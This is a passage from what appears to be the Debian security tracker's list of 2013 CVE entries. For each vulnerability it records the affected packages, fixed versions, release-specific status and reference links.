CVE-2013-7337 RESERVED CVE-2013-7341 (Multiple cross-site scripting (XSS) vulnerabilities in Flowplayer Flas ...) - moodle 2.6.2-1 [squeeze] - moodle (Vulnerable code not present) CVE-2013-7339 (The rds_ib_laddr_check function in net/rds/ib.c in the Linux kernel be ...) {DSA-2906-1} - linux 3.13-1 [wheezy] - linux 3.2.57-1 - linux-2.6 NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c2349758acf1874e4c2b93fe41d072336f1a31d0 CVE-2013-7336 (The qemuMigrationWaitForSpice function in qemu/qemu_migration.c in lib ...) - libvirt 1.1.4-1 [wheezy] - libvirt (Vulnerable code not present) [squeeze] - libvirt (Vulnerable code not present) NOTE: http://www.redhat.com/archives/libvir-list/2013-September/msg01208.html CVE-2013-7335 (Open redirect vulnerability in DotNetNuke (DNN) before 6.2.9 and 7.x b ...) NOT-FOR-US: DotNetNuke CVE-2013-7334 (Cross-site request forgery (CSRF) vulnerability in ImageCMS before 4.2 ...) NOT-FOR-US: ImageCMS CVE-2013-7333 (A vulnerability in version 0.90 of the Open Floodlight SDN controller ...) NOT-FOR-US: Open Floodlight CVE-2013-7332 (The Microsoft.XMLDOM ActiveX control in Microsoft Windows 8.1 and earl ...) NOT-FOR-US: Microsoft Windows CVE-2013-7331 (The Microsoft.XMLDOM ActiveX control in Microsoft Windows 8.1 and earl ...) NOT-FOR-US: Microsoft Windows CVE-2013-7345 (The BEGIN regular expression in the awk script detector in magic/Magdi ...) {DSA-3064-1 DSA-2873-1} - file 1:5.17-0.1 (bug #703993) NOTE: http://bugs.gw.com/view.php?id=164 NOTE: fixed in commit ef2329cf71acb59204dd981e2c6cce6c81fe467c - php5 5.6.0+dfsg-1 [squeeze] - php5 (Vulnerable code not present) NOTE: Wheezy's php5 is vulnerable in 5.4.4-14+deb7u14. Verified by rebuilding NOTE: magic.mgc out of ext/fileinfo/data_info.c and "strings magic.mgc |grep BEGIN" NOTE: returns "^\s*BEGIN\s*[{]". Same test in squeeze does not NOTE: report the problematic string. NOTE: Good fix is to regenerate the file with "php5 NOTE: create_data_file.php /usr/share/file/magic.mgc > data_info.c" once NOTE: you have a fixed libmagic1 installed. NOTE: fixed by php5 5.4.27 so DSA 3064-1 also fixed it in Wheezy CVE-2013-7330 (Jenkins before 1.502 allows remote authenticated users to configure an ...) - jenkins 1.565.2-1 (bug #739067) NOTE: https://github.com/jenkinsci/jenkins/commit/36342d71e29e0620f803a7470ce96c61761648d8 CVE-2013-7328 (Multiple integer signedness errors in the gdImageCrop function in ext/ ...) - php5 5.5.9+dfsg-1 [wheezy] - php5 (Vulnerable code was introduced in 5.5.0) [squeeze] - php5 (Vulnerable code was introduced in 5.5.0) CVE-2013-7327 (The gdImageCrop function in ext/gd/gd.c in PHP 5.5.x before 5.5.9 does ...) - php5 5.5.9+dfsg-1 [wheezy] - php5 (Vulnerable code was introduced in 5.5.0) [squeeze] - php5 (Vulnerable code was introduced in 5.5.0) CVE-2013-7326 (Cross-site scripting (XSS) vulnerability in vTiger CRM 5.4.0 allows re ...) NOT-FOR-US: vTiger CRM CVE-2013-7324 (Webkit-GTK 2.x (any version with HTML5 audio/video support based on GS ...) NOT-FOR-US: Historic webkit issue CVE-2013-7329 (The CGI::Application module before 4.50_50 and 4.50_51 for Perl, when ...) - libcgi-application-perl 4.50-2 (bug #739505) [wheezy] - libcgi-application-perl (Minor issue) [squeeze] - libcgi-application-perl (Minor issue) NOTE: suggested fix https://github.com/markstos/CGI--Application/pull/15 CVE-2013-7325 (An issue exists in uscan in devscripts before 2.13.19, which could let ...) {DSA-2836-1} - devscripts 2.13.9 [squeeze] - devscripts (Minor issue) CVE-2013-7321 (Cross-site scripting (XSS) vulnerability in D-Link DAP-2253 Access Poi ...) NOT-FOR-US: D-Link hardware CVE-2013-7320 (Cross-site request forgery (CSRF) vulnerability in D-Link DAP-2253 Acc ...) NOT-FOR-US: D-Link hardware CVE-2013-7319 (Cross-site scripting (XSS) vulnerability in the Download Manager plugi ...) NOT-FOR-US: WordPress plugin Download Manager CVE-2013-7322 (usersfile.c in liboath in OATH Toolkit before 2.4.1 does not properly ...) - oath-toolkit 2.4.1-1 (low; bug #738515) [wheezy] - oath-toolkit (Minor issue) NOTE: http://lists.nongnu.org/archive/html/oath-toolkit-help/2013-12/msg00000.html CVE-2013-7338 (Python before 3.3.4 RC1 allows remote attackers to cause a denial of s ...) - python2.5 (Only affects 3.x) - python2.6 (Only affects 3.x) - python2.7 (Only affects 3.x) - python3.1 (low) [squeeze] - python3.1 (Minor issue) - python3.2 (low) [wheezy] - python3.2 (Minor issue) - python3.3 3.3.4-1 (low) - python3.4 3.4~b3-1 (low) NOTE: http://bugs.python.org/issue20078 CVE-2013-XXXX [libclamunrar: double-free error libclamunrar_iface/unrar_iface.c] - libclamunrar 0.97.7+dfsg-1 (bug #770647) [wheezy] - libclamunrar (Non-free not supported, also minor issue) NOTE: https://www.openwall.com/lists/oss-security/2013/11/29/6 CVE-2013-XXXX [staden-io-lib buffer overflow] - staden-io-lib 1.13.3-2 (low; bug #729276) [squeeze] - staden-io-lib (Minor issue) [wheezy] - staden-io-lib (Minor issue) CVE-2013-XXXX [cakephp: local file inclusion] - cakephp (AssetDispatcher not present in 1.3) NOTE: http://web.archive.org/web/20140531064939/http://bakery.cakephp.org:80/articles/markstory/2013/07/18/cakephp_2_3_8_2_2_9_released NOTE: http://seclists.org/bugtraq/2013/Aug/97, needs a CVE assignment CVE-2013-XXXX [automysqlbackup code injection] - automysqlbackup 2.6+debian.3-1 (bug #706099) [squeeze] - automysqlbackup (Minor issue) CVE-2013-XXXX [autopostgresqlbackup code injection] - autopostgresqlbackup 1.0-2 (bug #706095) CVE-2013-XXXX [buffer overflow in commandline parsing] - swath 0.4.3-3 (low; bug #698189) [squeeze] - swath 0.4.0-4+squeeze1 CVE-2013-7323 (python-gnupg before 0.3.5 allows context-dependent attackers to execut ...) {DSA-2946-1} - python-gnupg 0.3.6-1 (bug #738509) CVE-2013-7318 (Cross-site scripting (XSS) vulnerability in BusinessFlow/login in Algo ...) NOT-FOR-US: AlgoSec Firewall Analyzer CVE-2013-7317 (Multiple cross-site scripting (XSS) vulnerabilities in CS-Cart before ...) NOT-FOR-US: CS-Cart CVE-2013-7316 (Cross-site scripting (XSS) vulnerability in GitLab 6.0 and other versi ...) - gitlab (Fixed before initial upload to Debian) CVE-2013-7315 (The Spring MVC in Spring Framework before 3.2.4 and 4.0.0.M1 through 4 ...) {DSA-2842-1} - libspring-java 3.0.6.RELEASE-10 (low; bug #720902) CVE-2013-7314 (The OSPF implementation on NEC IP38X, IX1000, IX2000, and IX3000 route ...) NOT-FOR-US: NEC routers CVE-2013-7313 (The OSPF implementation in Juniper Junos through 13.x, JunosE, and Scr ...) NOT-FOR-US: Juniper Junos CVE-2013-7312 (The OSPF implementation on Enterasys switches and routers does not con ...) NOT-FOR-US: Enterasys switches and routers CVE-2013-7311 (The OSPF implementation in Check Point Gaia OS R75.X and R76 and IPSO ...) NOT-FOR-US: Check Point Gaia OS CVE-2013-7310 (The OSPF implementation on Yamaha routers does not consider the possib ...) NOT-FOR-US: Yamaha routers CVE-2013-7309 (The OSPF implementation in Extreme Networks EXOS does not consider the ...) NOT-FOR-US: Extreme Networks EXOS CVE-2013-7308 (The OSPF implementation on the D-Link DES-3810-28 switch with firmware ...) NOT-FOR-US: D-Link DES-3810-28 switch CVE-2013-7307 (The OSPF implementation on the Brocade Vyatta vRouter with software be ...) NOT-FOR-US: Brocade Vyatta vRouter CVE-2013-7306 (The OSPF implementation on Brocade routers does not consider the possi ...) NOT-FOR-US: Brocade routers CVE-2013-7305 (fpw.php in e107 through 1.0.4 does not check the user_ban field, which ...) NOT-FOR-US: e107 CVE-2013-7304 (Check Point Endpoint Security MI Server through R73 3.0.0 HFA2.5 does ...) NOT-FOR-US: Check Point Endpoint Security MI Server CVE-2013-7297 RESERVED CVE-2013-7295 (Tor before 0.2.4.20, when OpenSSL 1.x is used in conjunction with a ce ...) - tor 0.2.4.20-1 (low) [wheezy] - tor (Minor issue) [squeeze] - tor (OpenSSL in oldstable not affected) CVE-2013-7303 (Multiple cross-site scripting (XSS) vulnerabilities in (1) squelettes- ...) - spip 3.0.13-1 (bug #736170) [wheezy] - spip 2.1.17-1+deb7u3 [squeeze] - spip (Not supported in Squeeze LTS) CVE-2013-7302 (Session fixation vulnerability in the Ubercart module 6.x-2.x before 6 ...) NOT-FOR-US: Drupal contrib CVE-2013-7301 (Cantata before 1.2.2 does not restrict access to files in the play que ...) - cantata (Vulnerable code introduced with 1.2.0; bug #736154) NOTE: https://code.google.com/p/cantata/issues/detail?id=356 CVE-2013-7300 (Absolute path traversal vulnerability in cantata before 1.2.2 allows l ...) - cantata (Vulnerable code introduced with 1.2.0; bug #736154) NOTE: https://code.google.com/p/cantata/issues/detail?id=356 CVE-2013-7299 (framework/common/messageheaderparser.cpp in Tntnet before 2.2.1 allows ...) - tntnet 2.2.1-1 (low; bug #735881) [wheezy] - tntnet (Minor issue) [squeeze] - tntnet (Minor issue) CVE-2013-7298 (query_params.cpp in cxxtools before 2.2.1 allows remote attackers to c ...) - cxxtools 2.2.1-1 (low; bug #735880) [wheezy] - cxxtools (Issue not present, introduced in v2.2) [squeeze] - cxxtools (Issue not present, introduced in v2.2) CVE-2013-7296 (The JBIG2Stream::readSegments method in JBIG2Stream.cc in Poppler befo ...) - poppler (Introduced in a3cee0e7e9dd292c70fe1fa19a92e70bbc1e1b41) NOTE: http://cgit.freedesktop.org/poppler/poppler/commit/?id=58e04a08afee NOTE: https://bugs.kde.org/show_bug.cgi?id=328511 CVE-2013-7294 (The ikev2parent_inI1outR1 function in pluto/ikev2_parent.c in libreswa ...) NOT-FOR-US: libreswan, strongSwan not affected (pluto never supported ikev2) CVE-2013-7293 (The ASUS WL-330NUL router has a configuration process that relies on a ...) NOT-FOR-US: ASUS router CVE-2013-7292 (VASCO IDENTIKEY Authentication Server (IAS) 3.4.x allows remote authen ...) NOT-FOR-US: VASCO IAS CVE-2013-7291 (memcached before 1.4.17, when running in verbose mode, allows remote a ...) {DLA-701-1} - memcached 1.4.20-1 (low; bug #735314) [squeeze] - memcached (Minor issue) NOTE: https://github.com/memcached/memcached/commit/fbe823d9a61b5149cd6e3b5e17bd28dd3b8dd760 CVE-2013-7290 (The do_item_get function in items.c in memcached 1.4.4 and other versi ...) - memcached 1.4.13-0.2 [squeeze] - memcached 1.4.5-1+deb6u1 NOTE: https://github.com/memcached/memcached/commit/fbe823d9a61b5149cd6e3b5e17bd28dd3b8dd760 NOTE: actual patch should be adjusted in case there is a further memcached upload accoring to upstream commit CVE-2013-7289 (Multiple cross-site scripting (XSS) vulnerabilities in register.php in ...) NOT-FOR-US: Andy's PHP Knowledgebase (Aphpkb) CVE-2013-7287 (MobileIron VSP < 5.9.1 and Sentry < 5.0 has an insecure encrypti ...) NOT-FOR-US: MobileIron CVE-2013-7286 (MobileIron VSP < 5.9.1 and Sentry < 5.0 has a weak password obfu ...) NOT-FOR-US: MobileIron CVE-2013-7283 (Race condition in the libreswan.spec files for Red Hat Enterprise Linu ...) - libreswan (Fixed before initial upload in Debian; /tmp-race in libreswan.spec for rpm based systems) CVE-2013-7282 (The management web interface on the Nisuta NS-WIR150NE router with fir ...) NOT-FOR-US: Nisuta NS-WIR150NE router CVE-2013-7280 (Buffer overflow in HansoTools Hanso Player 2.1.0, 2.5.0, and earlier a ...) NOT-FOR-US: HansoTools Hanso Player CVE-2013-7279 (Cross-site scripting (XSS) vulnerability in views/video-management/pre ...) NOT-FOR-US: WordPress plugin S3 Video CVE-2013-7278 (SQL injection vulnerability in Naxtech CMS Afroditi 1.0 allows remote ...) NOT-FOR-US: Naxtech CMS Afroditi CVE-2013-7277 (Multiple cross-site scripting (XSS) vulnerabilities in Andy's PHP Know ...) NOT-FOR-US: Andy's PHP Knowledgebase (Aphpkb) CVE-2013-7276 (Cross-site scripting (XSS) vulnerability in inc/raf_form.php in the Re ...) NOT-FOR-US: WordPress plugin Recommend to a friend CVE-2013-7275 (Cross-site scripting (XSS) vulnerability in misc.php in MyBB (aka MyBu ...) NOT-FOR-US: MyBB CVE-2013-7274 (Cross-site scripting (XSS) vulnerability in Wallpaper Script 3.5.0082 ...) NOT-FOR-US: Wallpaper Script CVE-2013-7272 RESERVED CVE-2013-7288 (Cross-site scripting (XSS) vulnerability in the mycode_parse_video fun ...) NOT-FOR-US: MyBB (aka MyBulletinBoard) CVE-2013-7285 (Xstream API versions up to 1.4.6 and version 1.4.10, if the security f ...) - libxstream-java 1.4.7-1 (bug #734821) [wheezy] - libxstream-java (Vulnerability introduced in 1.4.5) [squeeze] - libxstream-java (Vulnerability introduced in 1.4.5) NOTE: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html NOTE: http://markmail.org/message/kfqoqdfj5fnup5co?q=list:org.codehaus.xstream.dev&page=3 NOTE: initial patch: https://fisheye.codehaus.org/changelog/xstream?cs=2210 CVE-2013-7284 (The PlRPC module, possibly 0.2020 and earlier, for Perl uses the Stora ...) - libplrpc-perl (high; bug #734789) [squeeze] - libplrpc-perl (Unsupported in squeeze-lts) NOTE: Upstream appears dead. CVE-2013-7273 (GNOME Display Manager (gdm) 3.4.1 and earlier, when disable-user-list ...) - gdm3 3.8.3-1 (low; bug #683338) [wheezy] - gdm3 (Minor issue) [squeeze] - gdm3 (Vulnerable code not present) CVE-2013-7271 (The x25_recvmsg function in net/x25/af_x25.c in the Linux kernel befor ...) - linux-2.6 [squeeze] - linux-2.6 (Too intrusive to backport) - linux 3.12.6-1 [wheezy] - linux 3.2.54-1 NOTE: upstream fix: https://git.kernel.org/linus/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c NOTE: included in https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.12.4 CVE-2013-7270 (The packet_recvmsg function in net/packet/af_packet.c in the Linux ker ...) - linux-2.6 [squeeze] - linux-2.6 (Too intrusive to backport) - linux 3.12.6-1 [wheezy] - linux 3.2.54-1 NOTE: upstream fix: https://git.kernel.org/linus/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c NOTE: included in https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.12.4 CVE-2013-7269 (The nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel ...) - linux-2.6 [squeeze] - linux-2.6 (Too intrusive to backport) - linux 3.12.6-1 [wheezy] - linux 3.2.54-1 NOTE: upstream fix: https://git.kernel.org/linus/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c NOTE: included in https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.12.4 CVE-2013-7268 (The ipx_recvmsg function in net/ipx/af_ipx.c in the Linux kernel befor ...) - linux-2.6 [squeeze] - linux-2.6 (Too intrusive to backport) - linux 3.12.6-1 [wheezy] - linux 3.2.54-1 NOTE: upstream fix: https://git.kernel.org/linus/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c NOTE: included in https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.12.4 CVE-2013-7267 (The atalk_recvmsg function in net/appletalk/ddp.c in the Linux kernel ...) - linux-2.6 [squeeze] - linux-2.6 (Too intrusive to backport) - linux 3.12.6-1 [wheezy] - linux 3.2.54-1 NOTE: upstream fix: https://git.kernel.org/linus/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c NOTE: included in https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.12.4 CVE-2013-7266 (The mISDN_sock_recvmsg function in drivers/isdn/mISDN/socket.c in the ...) {DLA-103-1} - linux-2.6 [squeeze] - linux-2.6 (Too intrusive to backport) - linux 3.12.6-1 [wheezy] - linux 3.2.54-1 NOTE: upstream fix: https://git.kernel.org/linus/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c NOTE: included in https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.12.4 CVE-2013-7262 (SQL injection vulnerability in the msPostGISLayerSetTimeFilter functio ...) - mapserver 6.4.1-1 (low; bug #734565) [wheezy] - mapserver 6.0.1-3.2+deb7u2 [squeeze] - mapserver 5.6.5-2+squeeze3 NOTE: https://github.com/mapserver/mapserver/issues/4834 CVE-2013-7261 RESERVED CVE-2013-7260 (Multiple stack-based buffer overflows in RealNetworks RealPlayer befor ...) NOT-FOR-US: RealPlayer CVE-2013-7281 (The dgram_recvmsg function in net/ieee802154/dgram.c in the Linux kern ...) - linux-2.6 (Introduced in 3.10) - linux 3.12.6-1 (low) [wheezy] - linux (Introduced in 3.10) CVE-2013-7265 (The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel b ...) {DSA-2906-1} - linux-2.6 (low) [wheezy] - linux 3.2.54-1 - linux 3.12.6-1 (low) CVE-2013-7264 (The l2tp_ip_recvmsg function in net/l2tp/l2tp_ip.c in the Linux kernel ...) {DSA-2906-1} - linux-2.6 (low) [wheezy] - linux 3.2.54-1 - linux 3.12.6-1 (low) CVE-2013-7263 (The Linux kernel before 3.12.4 updates certain length values before en ...) {DSA-2906-1} - linux-2.6 (low) - linux 3.12.6-1 (low) [wheezy] - linux 3.2.54-1 (low) CVE-2013-7251 (Multiple cross-site request forgery (CSRF) vulnerabilities in ProjectF ...) NOT-FOR-US: ProjectForge CVE-2013-7250 (Cross-site scripting (XSS) vulnerability in the JsonBuilder implementa ...) NOT-FOR-US: ProjectForge CVE-2013-7248 (Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other ...) NOT-FOR-US: Franklin Fueling Systems TS-550 CVE-2013-7247 (cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware ...) NOT-FOR-US: Franklin Fueling Systems TS-550 CVE-2013-7246 (Buffer overflow in the IconCreate method in an ActiveX control in the ...) NOT-FOR-US: DaumGame ActiveX plugin CVE-2013-7245 (The Backup Server component in SAP Sybase ASE 15.7 before SP51 allows ...) NOT-FOR-US: SAP Sybase ASE CVE-2013-7244 RESERVED CVE-2013-7243 (Multiple cross-site scripting (XSS) vulnerabilities in GetSimple CMS 3 ...) NOT-FOR-US: GetSimple CMS CVE-2013-7238 RESERVED CVE-2013-7237 RESERVED CVE-2013-7259 (Multiple cross-site request forgery (CSRF) vulnerabilities in Neo4J 1. ...) - neo4j-community (bug #685615) NOTE: http://blog.diniscruz.com/2013/08/neo4j-csrf-payload-to-start-processes.html CVE-2013-7258 (Cross-site scripting (XSS) vulnerability in web2ldap 1.1.x before 1.1. ...) - web2ldap (low; bug #734107) CVE-2013-7257 (Cross-site scripting (XSS) vulnerability in Codiad 2.0.7 allows remote ...) NOT-FOR-US: Codiad CVE-2013-7256 (Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4. ...) NOT-FOR-US: Ops View CVE-2013-7255 (Open redirect vulnerability in Opsview before 4.4.2 allows remote atta ...) NOT-FOR-US: Ops View CVE-2013-7254 (Cross-site scripting (XSS) vulnerability in Opsview before 4.4.2 allow ...) NOT-FOR-US: Ops View CVE-2013-7253 RESERVED CVE-2013-7252 (kwalletd in KWallet before KDE Applications 14.12.0 uses Blowfish with ...) - kde-runtime 4:4.12.2-1 [wheezy] - kde-runtime (4.12 introduces a GnuPG backend, no backport planned) - kdebase-runtime [squeeze] - kdebase-runtime (4.12 introduces a GnuPG backend, no backport planned) NOTE: http://gaganpreet.in/blog/2013/07/24/kwallet-security-analysis/ NOTE: Upstream advisory: https://www.kde.org/info/security/advisory-20150109-1.txt CVE-2013-7233 (Cross-site request forgery (CSRF) vulnerability in the retrospam compo ...) - wordpress (unimportant) NOTE: issue only allows comments from posts to be moved to "needs moderation" list CVE-2013-7232 (SQL injection vulnerability in ESRI ArcGIS for Server through 10.2 all ...) NOT-FOR-US: ESRI ArcGIS CVE-2013-7231 (Cross-site scripting (XSS) vulnerability in the Mobile Content Server ...) NOT-FOR-US: ESRI ArcGIS CVE-2013-7230 RESERVED CVE-2013-7229 RESERVED CVE-2013-7228 RESERVED CVE-2013-7227 RESERVED CVE-2013-7226 (Integer overflow in the gdImageCrop function in ext/gd/gd.c in PHP 5.5 ...) - php5 5.5.9+dfsg-1 [wheezy] - php5 (Vulnerable code was introduced in 5.5.0) [squeeze] - php5 (Vulnerable code was introduced in 5.5.0) NOTE: https://bugs.php.net/bug.php?id=66356 NOTE: http://www.php.net/manual/en/function.imagecrop.php CVE-2013-7219 (SQL injection vulnerability in vote.php in the 2Glux Sexy Polling (com ...) NOT-FOR-US: Joomla component com_sexypolling CVE-2013-7218 RESERVED CVE-2013-7217 (Unspecified vulnerability in Zimbra Collaboration Server 7.2.5 and ear ...) NOT-FOR-US: Zimbra CVE-2013-7216 (Multiple SQL injection vulnerabilities in Classifieds Creator 2.0 allo ...) NOT-FOR-US: Classifieds Creator CVE-2013-7215 RESERVED CVE-2013-7214 RESERVED CVE-2013-7213 RESERVED CVE-2013-7212 RESERVED CVE-2013-7211 RESERVED CVE-2013-7210 RESERVED CVE-2013-7209 (Cross-site request forgery (CSRF) vulnerability in admBase/login.page ...) NOT-FOR-US: jForum CVE-2013-7208 RESERVED CVE-2013-7207 RESERVED CVE-2013-7206 RESERVED CVE-2013-7204 (Cross-site request forgery (CSRF) vulnerability in set_users.cgi in Co ...) NOT-FOR-US: Conceptronic CIPCAMPTIWL Camera CVE-2013-7202 (The WebHybridClient class in PayPal 5.3 and earlier for Android allows ...) NOT-FOR-US: Paypal for Android CVE-2013-7201 (WebHybridClient.java in PayPal 5.3 and earlier for Android ignores SSL ...) NOT-FOR-US: Paypal for Android CVE-2013-7200 RESERVED CVE-2013-7199 RESERVED CVE-2013-7198 RESERVED CVE-2013-7197 RESERVED CVE-2013-7196 (static/ajax.php in PHPFox 3.7.3, 3.7.4, and 3.7.5 allows remote authen ...) NOT-FOR-US: PHPFox CVE-2013-7195 (PHPFox 3.7.3 and 3.7.4 allows remote authenticated users to bypass int ...) NOT-FOR-US: PHPFox CVE-2013-7194 (Multiple cross-site scripting (XSS) vulnerabilities in www/administrat ...) NOT-FOR-US: eFront CVE-2013-7193 (Multiple SQL injection vulnerabilities in C2C Forward Auction Creator ...) NOT-FOR-US: C2C Forward Auction Creator CVE-2013-7192 (Multiple SQL injection vulnerabilities in Dynamic Biz Website Builder ...) NOT-FOR-US: Dynamic Biz Website Builder CVE-2013-7190 (Multiple directory traversal vulnerabilities in iScripts AutoHoster, p ...) NOT-FOR-US: iScripts AutoHoster CVE-2013-7186 (Buffer overflow in Steinberg MyMp3PRO 5.0 (Build 5.1.0.21) allows remo ...) NOT-FOR-US: Steinberg MyMp3PRO CVE-2013-7185 (PotPlayer 1.5.40688: .avi File Memory Corruption ...) NOT-FOR-US: PotPlayer CVE-2013-7184 (Gretech GOM Media Player 2.2.56.5158 and earlier allows remote attacke ...) NOT-FOR-US: Gretech GOM Media Player CVE-2013-7183 (cgi-bin/reboot.cgi on Seowon Intech SWC-9100 routers allows remote att ...) NOT-FOR-US: Seowon Intech SWC-9100 CVE-2013-7182 (Cross-site scripting (XSS) vulnerability in firewall/schedule/recurrdl ...) NOT-FOR-US: Fortinet FortiOS CVE-2013-7181 (Cross-site scripting (XSS) vulnerability in user/ldap_user/add in Fort ...) NOT-FOR-US: FortiWeb CVE-2013-7180 (Cobham SAILOR 900 VSAT; SAILOR FleetBroadBand 150, 250, and 500; EXPLO ...) NOT-FOR-US: Cobham CVE-2013-7179 (The ping functionality in cgi-bin/diagnostic.cgi on Seowon Intech SWC- ...) NOT-FOR-US: Seowon Intech SWC-9100 routers CVE-2013-7178 RESERVED CVE-2013-7177 (config/filter.d/cyrus-imap.conf in the cyrus-imap filter in Fail2ban b ...) {DSA-2979-1 DLA-0021-1} - fail2ban 0.8.11-1 [squeeze] - fail2ban 0.8.4-3+squeeze3 NOTE: https://github.com/fail2ban/fail2ban/commit/bd175f026737d66e7110868fb50b3760ff75e087 CVE-2013-7176 (config/filter.d/postfix.conf in the postfix filter in Fail2ban before ...) {DSA-2979-1 DLA-0021-1} - fail2ban 0.8.11-1 [squeeze] - fail2ban 0.8.4-3+squeeze3 CVE-2013-7175 (Multiple SQL injection vulnerabilities in Avanset Visual CertExam Mana ...) NOT-FOR-US: Avanset Visual CertExam Manager CVE-2013-7174 (Absolute path traversal vulnerability in cgi-bin/jc.cgi in QNAP QTS be ...) NOT-FOR-US: QNAP QTS CVE-2013-7173 (Belkin n750 routers have a buffer overflow. ...) NOT-FOR-US: Belkin CVE-2013-7172 (Slackware 13.1, 13.37, 14.0 and 14.1 contain world-writable permission ...) - libiodbc2 (RPATH issue slackware specific) CVE-2013-7171 (Slackware 14.0 and 14.1, and Slackware LLVM 3.0-i486-2 and 3.3-i486-2, ...) - llvm-2.9 (RPATH issue slackware specific) - llvm-3.0 (RPATH issue slackware specific) - llvm-3.1 (RPATH issue slackware specific) - llvm-toolchain-3.2 (RPATH issue slackware specific) - llvm-toolchain-3.3 (RPATH issue slackware specific) - llvm-toolchain-3.4 (RPATH issue slackware specific) - llvm-toolchain-snapshot (RPATH issue slackware specific) CVE-2013-7170 RESERVED CVE-2013-7169 REJECTED CVE-2013-7168 REJECTED CVE-2013-7167 REJECTED CVE-2013-7166 REJECTED CVE-2013-7165 REJECTED CVE-2013-7164 REJECTED CVE-2013-7163 RESERVED CVE-2013-7162 RESERVED CVE-2013-7161 RESERVED CVE-2013-7160 RESERVED CVE-2013-7159 RESERVED CVE-2013-7158 RESERVED CVE-2013-7157 RESERVED CVE-2013-7156 RESERVED CVE-2013-7155 RESERVED CVE-2013-7154 RESERVED CVE-2013-7153 RESERVED CVE-2013-7152 RESERVED CVE-2013-7151 RESERVED CVE-2013-7150 RESERVED CVE-2013-7249 (Fat Free CRM before 0.12.1 does not restrict XML serialization, which ...) NOT-FOR-US: Fat Free CRM CVE-2013-7242 (SQL injection vulnerability in zp-core/zp-extensions/wordpress_import. ...) NOT-FOR-US: Zenphoto CVE-2013-7241 (Cross-site scripting (XSS) vulnerability in the export function in zp- ...) NOT-FOR-US: Zenphoto CVE-2013-7240 (Directory traversal vulnerability in download-file.php in the Advanced ...) NOT-FOR-US: Dewplayer CVE-2013-7239 (memcached before 1.4.17 allows remote attackers to bypass authenticati ...) {DSA-2832-1} - memcached 1.4.13-0.3 (bug #733643) [squeeze] - memcached (vulnerable code present, but SASL authentication support not enabled) NOTE: https://code.google.com/p/memcached/wiki/ReleaseNotes1417 NOTE: https://code.google.com/p/memcached/issues/detail?id=316 NOTE: https://github.com/memcached/memcached/commit/87c1cf0f20be20608d3becf854e9cf0910f4ad32 CVE-2013-7236 (Simple Machines Forum (SMF) 2.0.6, 1.1.19, and earlier allows remote a ...) NOT-FOR-US: Simple Machines Forum CVE-2013-7235 (Simple Machines Forum (SMF) before 1.1.19 and 2.x before 2.0.6 allows ...) NOT-FOR-US: Simple Machines Forum CVE-2013-7234 (Simple Machines Forum (SMF) before 1.1.19 and 2.x before 2.0.6 allows ...) NOT-FOR-US: Simple Machines Forum CVE-2013-7225 (Multiple SQL injection vulnerabilities in app/controllers/home_control ...) NOT-FOR-US: Fat Free CRM CVE-2013-7224 (Fat Free CRM before 0.12.1 does not restrict JSON serialization, which ...) NOT-FOR-US: Fat Free CRM CVE-2013-7223 (Multiple cross-site request forgery (CSRF) vulnerabilities in Fat Free ...) NOT-FOR-US: Fat Free CRM CVE-2013-7222 (config/initializers/secret_token.rb in Fat Free CRM before 0.12.1 has ...) NOT-FOR-US: Fat Free CRM CVE-2013-7221 (The automatic screen lock functionality in GNOME Shell (aka gnome-shel ...) - gnome-shell 3.10.1-1 [wheezy] - gnome-shell (Vulnerable code not present) NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=708313 NOTE: https://git.gnome.org/browse/gnome-shell/commit/js/ui/main.js?id=efdf1ff755943fba1f8a9aaeff77daa3ed338088 CVE-2013-7220 (js/ui/screenShield.js in GNOME Shell (aka gnome-shell) before 3.8 allo ...) - gnome-shell 3.8.4-1 [wheezy] - gnome-shell (Vulnerable code not present) NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=686740 NOTE: https://git.gnome.org/browse/gnome-shell/commit/js/ui/screenShield.js?id=209014b083dbe86ed0e0860a6016735571b56f94 CVE-2013-7205 (Off-by-one error in the process_cgivars function in contrib/daemonchk. ...) {DLA-1615-1} - nagios3 (low; bug #771466) [squeeze] - nagios3 (Minor issue) [wheezy] - nagios3 (Minor issue) NOTE: additional changed files for nagios3, cf. CVE-2013-7108 NOTE: Fixed by https://sourceforge.net/p/nagios/nagioscore/ci/d97e03f32741a7d851826b03ed73ff4c9612a866/ NOTE: See also https://github.com/Icinga/icinga-core/issues/1399 CVE-2013-7203 (gitolite before commit fa06a34 might allow local users to read arbitra ...) - gitolite3 3.5.3.1-1 NOTE: http://marc.info/?l=oss-security&m=138783069700756&w=2 CVE-2013-7191 (Cross-site scripting (XSS) vulnerability in Tenmiles Helpdesk Pilot al ...) NOT-FOR-US: Tenmiles Helpdesk Pilot CVE-2013-7189 (Multiple SQL injection vulnerabilities in iScripts AutoHoster, possibl ...) NOT-FOR-US: iScripts AutoHoster CVE-2013-7188 (Cross-site scripting (XSS) vulnerability in KBKP Software HostBill bef ...) NOT-FOR-US: HostBill CVE-2013-7187 (SQL injection vulnerability in form.php in the FormCraft plugin 1.3.7 ...) NOT-FOR-US: WordPress plugin FormCraft CVE-2013-7149 (SQL injection vulnerability in www/delivery/axmlrpc.php (aka the XML-R ...) NOT-FOR-US: Revive Adserver CVE-2013-7148 REJECTED CVE-2013-7147 REJECTED CVE-2013-7146 REJECTED CVE-2013-7145 REJECTED CVE-2013-7144 (LINE 3.2.1.83 and earlier on Windows and 3.2.1 and earlier on OS X doe ...) NOT-FOR-US: LINE CVE-2013-7143 (Cross-site 